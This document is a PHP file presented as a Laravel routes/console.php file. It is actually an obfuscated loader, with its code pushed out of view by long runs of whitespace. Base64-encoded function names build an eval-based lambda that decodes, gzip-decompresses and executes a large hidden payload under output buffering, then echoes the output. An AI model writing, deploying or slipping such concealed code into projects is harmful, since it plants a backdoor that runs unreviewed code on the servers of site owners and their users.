<?php 
        $__='printf';$_='Loading routes/console.php';
        











































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtmltv2jAUx9+R9h14qJRWmlgITdsI5aFkxDhpmQYjt5cqtqkpGJI1JCH59DMXtUV76bSt06rziwI45Fz8Pyd+iNxs7jm5k5hK+viwWt8r3d3wgKk8Jvl6mn2iySpLxLSVztKmJeIsa7VaSrdx8ND80IDj7Y7GtkTNP4j50xUlaBtZ6LcfItQ3ld2l52q/ikMbmU0AAID3iUKXnsoCJ8fI00K/TBzbuA+qxeV+0ZSr5n65vgOpAAAAAAAAAOB/A15nAAAAvF8UEmfTi/M7NqUJmypdUAQAAAAAfovjvQUWT9tUm/Cxv8mY307J0lYjb4NIx8sjZKuxb+RBX+S000vpUuRRnbksGArcFxkZeOvY12cMeXTS8UqKjIrZGxT6w1mEvDro2xVDog7980uLJ4XL06ubsbr+y6d7b/U+E02vibYR2HYKFowELd8o9nV6he1REge3PFqKLBpL3apeJ0ZeJX/rpDPhxLd1jEYi2uo57s0IKjnRQj71jTZ9kLkjo2aBIzByZlTzFhgNC7KSJ5ps5zYnWnsd+vqCVud85Nvz2HppI2ppVzD5Px6MCoz6PNSMtYyZR1YvlX5UaTvfx90UTJM5VL2ZtSo51cSaIqkZsks6cApZx2TvQ+SyxpUcy37QV3jAUoY4j/axn/JxOrd8PLmS8/PUGBnb/KQeyfebMnG/Bo4aB8MZmScXz/nwlfRXUySkNjTDKGqT5XDXc1g2Jh5kLrauObZG0p+ob77pu1iRr6vuUU8mFzTwCoYmiTteXForNZX3llKPknSGwrVYX8YuCdrqbufb+TzZVr0N8w1Vxk+/lImpdBuNt38Yzd336WF01v0V8xe2rzE8eQ54qmw/lY9PYWEv0b/ZS3Rcm9OjZtiX5qz7A6/yXdA=';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      










































































































































































                                                                                                                                                                                                                     $________;
